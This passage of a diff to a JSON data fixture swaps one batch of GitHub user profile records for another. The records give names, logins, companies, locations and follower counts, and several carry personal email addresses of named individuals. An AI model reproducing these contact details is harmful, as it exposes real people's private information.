"2024-09-12T01:33:39.503Z", - "name": "Peter Kline", - "login": "peterkline", - "email": "peterkline@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/518270?v=4", - "company": "@seluxdx ", - "location": "New Hampshire", + "nest_created_at": "2024-09-22T09:37:43.474Z", + "nest_updated_at": "2024-09-22T19:36:45.332Z", + "name": "FreakyFreddie", + "login": "FreakyFreddie", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/18365222?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 2, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2010-12-10T19:52:08Z", - "updated_at": "2024-08-16T15:24:40Z", - "node_id": "MDQ6VXNlcjUxODI3MA==", - "bio": "Doing the DevOps thing for a hell of a long time. I like cold beverages", + "public_gists_count": 1, + "public_repositories_count": 26, + "created_at": "2016-04-09T13:00:38Z", + "updated_at": "2021-03-05T22:15:27Z", + "node_id": "MDQ6VXNlcjE4MzY1MjIy", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2571, + "pk": 7924, "fields": { - "nest_created_at": "2024-09-12T01:33:26.845Z", - "nest_updated_at": "2024-09-12T01:33:26.845Z", - "name": "", - "login": "Marx314", + "nest_created_at": "2024-09-22T09:37:43.801Z", + "nest_updated_at": "2024-09-22T19:36:45.654Z", + "name": "Fábio Dias", + "login": "Enigmatyk", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1593248?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5115163?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 34, - "created_at": "2012-03-31T13:44:15Z", - "updated_at": "2024-02-10T14:13:59Z", - "node_id": "MDQ6VXNlcjE1OTMyNDg=", + "following_count": 7, + "followers_count": 1, + "public_gists_count": 2, + "public_repositories_count": 65, + "created_at": "2013-07-29T17:54:48Z", + "updated_at": "2024-09-19T14:41:07Z", + "node_id": "MDQ6VXNlcjUxMTUxNjM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424528,24 +684027,24 @@ }, { "model": "github.user", - "pk": 2572, + "pk": 7925, "fields": { - "nest_created_at": "2024-09-12T01:33:28.492Z", - "nest_updated_at": "2024-09-12T01:33:28.492Z", - "name": "Erwan de FERRIERES", - "login": "erwandf", - "email": "erwan.deferrieres@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/397629?v=4", + "nest_created_at": "2024-09-22T09:37:44.135Z", + "nest_updated_at": "2024-09-22T19:36:45.975Z", + "name": "Gregor Ratajc", + "login": "greginvm", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10724016?v=4", "company": "", - "location": "", + "location": "Slovenia", "collaborators_count": 0, - "following_count": 1, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 18, - "created_at": "2010-09-13T15:21:23Z", - "updated_at": "2024-06-07T13:27:36Z", - "node_id": "MDQ6VXNlcjM5NzYyOQ==", + "following_count": 7, + "followers_count": 13, + "public_gists_count": 2, + "public_repositories_count": 21, + "created_at": "2015-01-27T11:07:55Z", + "updated_at": "2024-09-20T17:49:40Z", + "node_id": "MDQ6VXNlcjEwNzI0MDE2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424553,24 +684052,24 @@ }, { "model": "github.user", - "pk": 2573, + "pk": 7926, "fields": { - "nest_created_at": "2024-09-12T01:33:31.994Z", - "nest_updated_at": "2024-09-12T01:33:31.994Z", - "name": "", - "login": "Souhila99", + "nest_created_at": "2024-09-22T09:37:44.455Z", + "nest_updated_at": "2024-09-22T19:36:46.284Z", + "name": "Gustavo Chaves", + "login": "gnustavo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/92251867?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/113992?v=4", + "company": "CPQD", + "location": "Campinas, SP, Brazil", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2021-10-10T10:08:06Z", - "updated_at": "2024-07-29T13:44:20Z", - "node_id": "U_kgDOBX-m2w", + "following_count": 4, + "followers_count": 22, + "public_gists_count": 13, + "public_repositories_count": 65, + "created_at": "2009-08-11T00:29:35Z", + "updated_at": "2024-08-19T12:29:57Z", + "node_id": "MDQ6VXNlcjExMzk5Mg==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424578,49 +684077,49 @@ }, { "model": "github.user", - "pk": 2574, + "pk": 7927, "fields": { - "nest_created_at": "2024-09-12T01:33:40.727Z", - "nest_updated_at": "2024-09-12T01:33:43.694Z", - "name": "Grégoire", - "login": "Trakeur", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/83607654?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:37:45.107Z", + "nest_updated_at": "2024-09-22T19:38:22.148Z", + "name": "Hasan Tayyar Beşik", + "login": "hasantayyar", + "email": "tayyar.besik@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/88295?v=4", + "company": "SumUp", + "location": "Berlin, Germany", "collaborators_count": 0, - "following_count": 2, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2021-05-03T18:20:00Z", - "updated_at": "2024-08-12T12:23:21Z", - "node_id": "MDQ6VXNlcjgzNjA3NjU0", + "following_count": 249, + "followers_count": 189, + "public_gists_count": 201, + "public_repositories_count": 879, + "created_at": "2009-05-25T12:06:23Z", + "updated_at": "2024-08-29T07:23:38Z", + "node_id": "MDQ6VXNlcjg4Mjk1", "bio": "", - "is_hireable": false, - "twitter_username": "" + "is_hireable": true, + "twitter_username": "htayyar" } }, { "model": "github.user", - "pk": 2575, + "pk": 7928, "fields": { - "nest_created_at": "2024-09-12T01:33:47.866Z", - "nest_updated_at": "2024-09-12T02:08:09.345Z", - "name": "Nick Castelli", - "login": "nvcastelli", + "nest_created_at": "2024-09-22T09:37:45.416Z", + "nest_updated_at": "2024-09-22T19:36:47.244Z", + "name": "Iain Rawson", + "login": "iainrawson", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3475905?v=4", - "company": "", - "location": "Austin, Tx", + "avatar_url": "https://avatars.githubusercontent.com/u/30925288?v=4", + "company": "@ovotech ", + "location": "Grundisburgh, Suffolk", "collaborators_count": 0, - "following_count": 7, - "followers_count": 7, + "following_count": 2, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2013-02-04T21:51:41Z", - "updated_at": "2024-07-23T18:59:12Z", - "node_id": "MDQ6VXNlcjM0NzU5MDU=", + "public_repositories_count": 23, + "created_at": "2017-08-11T09:23:11Z", + "updated_at": "2024-08-19T07:39:45Z", + "node_id": "MDQ6VXNlcjMwOTI1Mjg4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424628,24 +684127,24 @@ }, { "model": "github.user", - "pk": 2576, + "pk": 7929, "fields": { - "nest_created_at": "2024-09-12T01:33:50.746Z", - "nest_updated_at": "2024-09-12T01:33:50.746Z", - "name": "Brian Wilkinson", - "login": "brianwilkinson", - "email": "brian.wilkinson@fasthosts.com", - "avatar_url": "https://avatars.githubusercontent.com/u/18575959?v=4", + "nest_created_at": "2024-09-22T09:37:45.746Z", + "nest_updated_at": "2024-09-22T19:36:47.551Z", + "name": "Ian Coleman", + "login": "ibcoleman", + "email": "ibcoleman@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1636877?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2016-04-20T13:43:36Z", - "updated_at": "2024-09-02T14:42:47Z", - "node_id": "MDQ6VXNlcjE4NTc1OTU5", + "following_count": 3, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 25, + "created_at": "2012-04-12T13:55:03Z", + "updated_at": "2023-10-25T15:54:33Z", + "node_id": "MDQ6VXNlcjE2MzY4Nzc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424653,24 +684152,24 @@ }, { "model": "github.user", - "pk": 2577, + "pk": 7930, "fields": { - "nest_created_at": "2024-09-12T01:33:57.261Z", - "nest_updated_at": "2024-09-12T01:33:57.261Z", - "name": "", - "login": "gulsezim11", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/38872591?v=4", + "nest_created_at": "2024-09-22T09:37:46.067Z", + "nest_updated_at": "2024-09-22T19:36:47.862Z", + "name": "István Szénási", + "login": "szeist", + "email": "szeist@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3885905?v=4", "company": "", - "location": "", + "location": "Hungary", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2018-05-01T01:55:58Z", - "updated_at": "2023-05-25T12:23:06Z", - "node_id": "MDQ6VXNlcjM4ODcyNTkx", + "following_count": 9, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 12, + "created_at": "2013-03-16T20:38:52Z", + "updated_at": "2024-09-19T08:48:04Z", + "node_id": "MDQ6VXNlcjM4ODU5MDU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424678,24 +684177,24 @@ }, { "model": "github.user", - "pk": 2578, + "pk": 7931, "fields": { - "nest_created_at": "2024-09-12T01:33:59.332Z", - "nest_updated_at": "2024-09-12T01:33:59.332Z", - "name": "Andrei Kouznetchik", - "login": "akouznetchik", + "nest_created_at": "2024-09-22T09:37:46.717Z", + "nest_updated_at": "2024-09-22T19:36:48.501Z", + "name": "Ivan Morhun", + "login": "ivan-morhun", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/129385936?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/114015523?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2023-03-30T10:26:41Z", - "updated_at": "2024-09-04T07:57:12Z", - "node_id": "U_kgDOB7ZF0A", + "public_repositories_count": 1, + "created_at": "2022-09-20T17:03:13Z", + "updated_at": "2024-05-23T14:43:23Z", + "node_id": "U_kgDOBsu9Iw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424703,49 +684202,74 @@ }, { "model": "github.user", - "pk": 2579, + "pk": 7932, "fields": { - "nest_created_at": "2024-09-12T01:34:01.958Z", - "nest_updated_at": "2024-09-12T01:34:01.958Z", - "name": "Damian Śnieżek", - "login": "snieguu", + "nest_created_at": "2024-09-22T09:37:47.029Z", + "nest_updated_at": "2024-09-22T19:36:48.812Z", + "name": "JEON Se-Ok", + "login": "seokjeon", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6084074?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/33389418?v=4", + "company": "Chonnam National University", + "location": "Gwangju, Republic of Korea", + "collaborators_count": 0, + "following_count": 97, + "followers_count": 25, + "public_gists_count": 3, + "public_repositories_count": 16, + "created_at": "2017-11-05T09:36:39Z", + "updated_at": "2024-09-06T11:43:28Z", + "node_id": "MDQ6VXNlcjMzMzg5NDE4", + "bio": "SECURITY, START-UP", + "is_hireable": true, + "twitter_username": "_seokjeon" + } +}, +{ + "model": "github.user", + "pk": 7933, + "fields": { + "nest_created_at": "2024-09-22T09:37:47.350Z", + "nest_updated_at": "2024-09-22T19:36:49.136Z", + "name": "Jack Sullivan", + "login": "SafeEval", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10931391?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2013-12-02T09:11:32Z", - "updated_at": "2024-08-02T05:56:17Z", - "node_id": "MDQ6VXNlcjYwODQwNzQ=", - "bio": "", + "following_count": 2, + "followers_count": 21, + "public_gists_count": 46, + "public_repositories_count": 36, + "created_at": "2015-02-09T22:43:07Z", + "updated_at": "2024-09-04T17:27:37Z", + "node_id": "MDQ6VXNlcjEwOTMxMzkx", + "bio": "Additional passion projects hosted over at @DivergentCodes.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2580, + "pk": 7934, "fields": { - "nest_created_at": "2024-09-12T01:34:03.673Z", - "nest_updated_at": "2024-09-12T01:38:01.881Z", - "name": "", - "login": "khaledgithubwl", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/101721949?v=4", + "nest_created_at": "2024-09-22T09:37:47.669Z", + "nest_updated_at": "2024-09-22T19:38:21.515Z", + "name": "Jacob O'Toole", + "login": "JOT85", + "email": "jacob@jotpot.co.uk", + "avatar_url": "https://avatars.githubusercontent.com/u/13963941?v=4", "company": "", - "location": "", + "location": "Oxford / York, UK", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 8, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-03-16T13:20:02Z", - "updated_at": "2024-06-03T13:59:53Z", - "node_id": "U_kgDOBhAnXQ", + "public_repositories_count": 31, + "created_at": "2015-08-25T13:45:07Z", + "updated_at": "2024-09-16T08:38:17Z", + "node_id": "MDQ6VXNlcjEzOTYzOTQx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424753,74 +684277,74 @@ }, { "model": "github.user", - "pk": 2581, + "pk": 7935, "fields": { - "nest_created_at": "2024-09-12T01:34:11.859Z", - "nest_updated_at": "2024-09-12T01:34:11.859Z", - "name": "", - "login": "geirhede", + "nest_created_at": "2024-09-22T09:37:47.984Z", + "nest_updated_at": "2024-09-22T19:36:49.767Z", + "name": "Jacob Schooley", + "login": "jbschooley", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/110812801?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4310588?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2022-08-08T07:47:15Z", - "updated_at": "2023-09-21T12:32:45Z", - "node_id": "U_kgDOBpregQ", - "bio": "", + "following_count": 22, + "followers_count": 6, + "public_gists_count": 2, + "public_repositories_count": 25, + "created_at": "2013-05-01T09:50:03Z", + "updated_at": "2024-09-13T11:55:56Z", + "node_id": "MDQ6VXNlcjQzMTA1ODg=", + "bio": "Cybersecurity student and software engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2582, + "pk": 7936, "fields": { - "nest_created_at": "2024-09-12T01:34:14.330Z", - "nest_updated_at": "2024-09-12T01:34:14.330Z", - "name": "", - "login": "attilakarpatiorion", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/138430324?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:37:48.293Z", + "nest_updated_at": "2024-09-22T19:36:50.079Z", + "name": "James Alseth", + "login": "jalseth", + "email": "james@jalseth.me", + "avatar_url": "https://avatars.githubusercontent.com/u/34321259?v=4", + "company": "@Google", + "location": "Seattle", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2023-07-03T05:44:02Z", - "updated_at": "2023-10-05T00:05:25Z", - "node_id": "U_kgDOCEBHdA", + "following_count": 6, + "followers_count": 12, + "public_gists_count": 1, + "public_repositories_count": 22, + "created_at": "2017-12-06T21:52:18Z", + "updated_at": "2024-08-10T19:00:47Z", + "node_id": "MDQ6VXNlcjM0MzIxMjU5", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2583, + "pk": 7937, "fields": { - "nest_created_at": "2024-09-12T01:34:15.590Z", - "nest_updated_at": "2024-09-18T19:06:58.993Z", - "name": "", - "login": "WDN2010", + "nest_created_at": "2024-09-22T09:37:48.924Z", + "nest_updated_at": "2024-09-22T19:36:50.721Z", + "name": "Jeff Gran", + "login": "jeffgran", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/28731738?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/583270?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2017-05-16T12:54:42Z", - "updated_at": "2024-09-16T10:08:30Z", - "node_id": "MDQ6VXNlcjI4NzMxNzM4", + "followers_count": 13, + "public_gists_count": 2, + "public_repositories_count": 66, + "created_at": "2011-01-25T19:10:30Z", + "updated_at": "2024-09-20T11:24:10Z", + "node_id": "MDQ6VXNlcjU4MzI3MA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424828,24 +684352,24 @@ }, { "model": "github.user", - "pk": 2584, + "pk": 7938, "fields": { - "nest_created_at": "2024-09-12T01:34:17.293Z", - "nest_updated_at": "2024-09-12T01:34:17.293Z", - "name": "xiwu", - "login": "aboutbo", + "nest_created_at": "2024-09-22T09:37:49.236Z", + "nest_updated_at": "2024-09-22T19:36:51.031Z", + "name": "Jerome Marty", + "login": "jahrome", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13026505?v=4", - "company": "Netease", - "location": "Hangzhou", + "avatar_url": "https://avatars.githubusercontent.com/u/165039?v=4", + "company": "", + "location": "Toulouse, France", "collaborators_count": 0, - "following_count": 46, - "followers_count": 10, + "following_count": 1, + "followers_count": 25, "public_gists_count": 0, - "public_repositories_count": 68, - "created_at": "2015-06-24T02:19:29Z", - "updated_at": "2023-09-04T02:37:06Z", - "node_id": "MDQ6VXNlcjEzMDI2NTA1", + "public_repositories_count": 63, + "created_at": "2009-12-09T14:36:46Z", + "updated_at": "2023-02-16T10:44:02Z", + "node_id": "MDQ6VXNlcjE2NTAzOQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424853,74 +684377,74 @@ }, { "model": "github.user", - "pk": 2585, + "pk": 7939, "fields": { - "nest_created_at": "2024-09-12T01:34:19.038Z", - "nest_updated_at": "2024-09-12T01:34:19.038Z", - "name": "", - "login": "grumpy-miner", + "nest_created_at": "2024-09-22T09:37:49.628Z", + "nest_updated_at": "2024-09-22T19:36:51.338Z", + "name": "Jerrin Jacob", + "login": "jerrinss5", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/81763239?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/20667637?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 2, - "public_gists_count": 3, - "public_repositories_count": 15, - "created_at": "2021-04-01T14:40:23Z", - "updated_at": "2024-08-04T19:17:58Z", - "node_id": "MDQ6VXNlcjgxNzYzMjM5", - "bio": "", + "following_count": 19, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 31, + "created_at": "2016-07-26T17:31:57Z", + "updated_at": "2024-03-05T17:19:54Z", + "node_id": "MDQ6VXNlcjIwNjY3NjM3", + "bio": "Application Security Engineer | Software Developer | Security Enthusiast | Curious | Self learner | Tinkerer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2586, + "pk": 7940, "fields": { - "nest_created_at": "2024-09-12T01:34:26.700Z", - "nest_updated_at": "2024-09-12T01:34:26.700Z", - "name": "Matt Shein", - "login": "matts-au", - "email": "matt.shein@autonomic.com", - "avatar_url": "https://avatars.githubusercontent.com/u/85510950?v=4", - "company": "Autonomic", - "location": "Seattle, WA USA", + "nest_created_at": "2024-09-22T09:37:57.327Z", + "nest_updated_at": "2024-09-22T19:36:59.289Z", + "name": "Pablo Martín", + "login": "goinnn", + "email": "goinnn@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1101467?v=4", + "company": "Joinup", + "location": "Seville, Spain", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-06-07T16:39:54Z", - "updated_at": "2024-09-09T17:12:22Z", - "node_id": "MDQ6VXNlcjg1NTEwOTUw", + "following_count": 51, + "followers_count": 87, + "public_gists_count": 3, + "public_repositories_count": 82, + "created_at": "2011-10-04T10:49:16Z", + "updated_at": "2024-08-02T12:34:32Z", + "node_id": "MDQ6VXNlcjExMDE0Njc=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2587, + "pk": 7941, "fields": { - "nest_created_at": "2024-09-12T01:34:28.434Z", - "nest_updated_at": "2024-09-12T01:34:28.434Z", - "name": "Gurdip Sira", - "login": "GurdipS5", + "nest_created_at": "2024-09-22T09:37:57.643Z", + "nest_updated_at": "2024-09-22T19:36:59.602Z", + "name": "", + "login": "blag", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/87333788?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/597113?v=4", "company": "", - "location": "London", + "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 31, - "created_at": "2021-07-12T18:08:22Z", - "updated_at": "2024-09-05T17:36:37Z", - "node_id": "MDQ6VXNlcjg3MzMzNzg4", + "following_count": 7, + "followers_count": 24, + "public_gists_count": 2, + "public_repositories_count": 201, + "created_at": "2011-02-02T17:00:56Z", + "updated_at": "2024-05-20T23:19:29Z", + "node_id": "MDQ6VXNlcjU5NzExMw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424928,24 +684452,24 @@ }, { "model": "github.user", - "pk": 2588, + "pk": 7942, "fields": { - "nest_created_at": "2024-09-12T01:34:32.187Z", - "nest_updated_at": "2024-09-12T01:34:32.187Z", + "nest_created_at": "2024-09-22T09:37:57.956Z", + "nest_updated_at": "2024-09-22T19:36:59.910Z", "name": "", - "login": "antoinbo", + "login": "tomasgarzon", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/87284775?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1880752?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, + "following_count": 1, + "followers_count": 16, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2021-07-11T22:59:04Z", - "updated_at": "2024-08-09T06:20:59Z", - "node_id": "MDQ6VXNlcjg3Mjg0Nzc1", + "public_repositories_count": 30, + "created_at": "2012-06-22T11:23:04Z", + "updated_at": "2024-08-22T04:35:09Z", + "node_id": "MDQ6VXNlcjE4ODA3NTI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424953,49 +684477,49 @@ }, { "model": "github.user", - "pk": 2589, + "pk": 7943, "fields": { - "nest_created_at": "2024-09-12T01:34:34.438Z", - "nest_updated_at": "2024-09-12T01:34:34.438Z", - "name": "", - "login": "jwdisy", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/141859936?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:37:58.261Z", + "nest_updated_at": "2024-09-22T19:37:00.222Z", + "name": "Andrew Miller", + "login": "nanorepublica", + "email": "info@akmiller.co.uk", + "avatar_url": "https://avatars.githubusercontent.com/u/1997940?v=4", + "company": "@softwarecrafts ", + "location": "Cambridge, UK", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-08-09T17:02:14Z", - "updated_at": "2024-01-22T13:30:42Z", - "node_id": "U_kgDOCHScYA", + "following_count": 21, + "followers_count": 22, + "public_gists_count": 1, + "public_repositories_count": 56, + "created_at": "2012-07-18T11:14:16Z", + "updated_at": "2024-09-18T13:42:18Z", + "node_id": "MDQ6VXNlcjE5OTc5NDA=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2590, + "pk": 7944, "fields": { - "nest_created_at": "2024-09-12T01:34:39.056Z", - "nest_updated_at": "2024-09-12T02:09:26.184Z", - "name": "Markus Müller", - "login": "markusmuellerusi", - "email": "markus@dmsk-mueller.de", - "avatar_url": "https://avatars.githubusercontent.com/u/11981532?v=4", - "company": "-", - "location": "Usingen", + "nest_created_at": "2024-09-22T09:37:58.580Z", + "nest_updated_at": "2024-09-22T19:37:00.541Z", + "name": "Dmitriy Krasilnikov", + "login": "dmitry-krasilnikov", + "email": "krasilnikov.d.o@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1429266?v=4", + "company": "Billogram AB", + "location": "Stockholm, Sweden", "collaborators_count": 0, "following_count": 4, - "followers_count": 2, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2015-04-16T16:18:48Z", - "updated_at": "2023-11-16T08:14:47Z", - "node_id": "MDQ6VXNlcjExOTgxNTMy", + "public_repositories_count": 27, + "created_at": "2012-02-11T17:24:28Z", + "updated_at": "2024-07-24T09:50:31Z", + "node_id": "MDQ6VXNlcjE0MjkyNjY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -425003,49 +684527,49 @@ }, { "model": "github.user", - "pk": 2591, + "pk": 7945, "fields": { - "nest_created_at": "2024-09-12T01:34:44.528Z", - "nest_updated_at": "2024-09-12T02:09:49.302Z", - "name": "", - "login": "sithmein", - "email": "thorsten@meinl.bnv-bamberg.de", - "avatar_url": "https://avatars.githubusercontent.com/u/4947218?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:37:58.893Z", + "nest_updated_at": "2024-09-22T19:37:00.853Z", + "name": "Leilani Ann Raranga", + "login": "LeilaniAnn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13516405?v=4", + "company": "@Microsoft ", + "location": "Seattle,WA", "collaborators_count": 0, "following_count": 0, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2013-07-05T09:25:51Z", - "updated_at": "2024-09-02T11:32:44Z", - "node_id": "MDQ6VXNlcjQ5NDcyMTg=", + "followers_count": 18, + "public_gists_count": 1, + "public_repositories_count": 39, + "created_at": "2015-07-27T06:02:25Z", + "updated_at": "2024-06-03T18:58:16Z", + "node_id": "MDQ6VXNlcjEzNTE2NDA1", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2592, + "pk": 7946, "fields": { - "nest_created_at": "2024-09-12T01:34:46.570Z", - "nest_updated_at": "2024-09-12T01:34:46.570Z", - "name": "", - "login": "bofrog", + "nest_created_at": "2024-09-22T09:37:59.223Z", + "nest_updated_at": "2024-09-22T19:37:01.171Z", + "name": "Simon Litchfield", + "login": "litchfield", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/138496187?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/130636?v=4", "company": "", - "location": "", + "location": "Sydney", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2023-07-03T13:08:31Z", - "updated_at": "2023-08-24T16:33:08Z", - "node_id": "U_kgDOCEFIuw", + "following_count": 49, + "followers_count": 23, + "public_gists_count": 6, + "public_repositories_count": 58, + "created_at": "2009-09-24T01:49:13Z", + "updated_at": "2024-06-20T04:05:34Z", + "node_id": "MDQ6VXNlcjEzMDYzNg==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -425053,24 +684577,24 @@ }, { "model": "github.user", - "pk": 2593, + "pk": 7947, "fields": { - "nest_created_at": "2024-09-12T01:34:53.233Z", - "nest_updated_at": "2024-09-12T01:34:53.233Z", - "name": "rnd", - "login": "chenjianquan7", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26828709?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:37:59.534Z", + "nest_updated_at": "2024-09-22T19:37:01.481Z", + "name": "Aleh Rymašeŭski", + "login": "aleh-rymasheuski", + "email": "hi@aleh.me", + "avatar_url": "https://avatars.githubusercontent.com/u/9883236?v=4", + "company": "@Revolut", + "location": "Açores", "collaborators_count": 0, "following_count": 9, - "followers_count": 0, + "followers_count": 14, "public_gists_count": 0, - "public_repositories_count": 15, - "created_at": "2017-04-01T01:18:36Z", - "updated_at": "2024-09-02T03:19:05Z", - "node_id": "MDQ6VXNlcjI2ODI4NzA5", + "public_repositories_count": 7, + "created_at": "2014-11-21T12:45:52Z", + "updated_at": "2024-03-05T12:26:50Z", + "node_id": "MDQ6VXNlcjk4ODMyMzY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -425078,24 +684602,24 @@ }, { "model": "github.user", - "pk": 2594, + "pk": 7948, "fields": { - "nest_created_at": "2024-09-12T01:34:56.642Z", - "nest_updated_at": "2024-09-12T01:34:56.642Z", - "name": "", - "login": "rsproductsecurity", + "nest_created_at": "2024-09-22T09:37:59.849Z", + "nest_updated_at": "2024-09-22T19:37:01.794Z", + "name": "Aram Dulyan", + "login": "Aramgutang", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/139795744?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/55477?v=4", + "company": "The Interaction Consortium", + "location": "Sydney, Australia", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-07-17T16:32:58Z", - "updated_at": "2024-07-29T15:36:59Z", - "node_id": "U_kgDOCFUdIA", + "followers_count": 15, + "public_gists_count": 7, + "public_repositories_count": 7, + "created_at": "2009-02-18T08:17:15Z", + "updated_at": "2024-08-05T00:11:24Z", + "node_id": "MDQ6VXNlcjU1NDc3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -425103,24 +684627,24 @@ }, { "model": "github.user", - "pk": 2595, + "pk": 7949, "fields": { - "nest_created_at": "2024-09-12T01:34:58.262Z", - "nest_updated_at": "2024-09-12T01:34:58.262Z", + "nest_created_at": "2024-09-22T09:38:00.483Z", + "nest_updated_at": "2024-09-22T19:37:02.459Z", "name": "", - "login": "Atharex", + "login": "superdmp", "email": "", - "avatar_url": 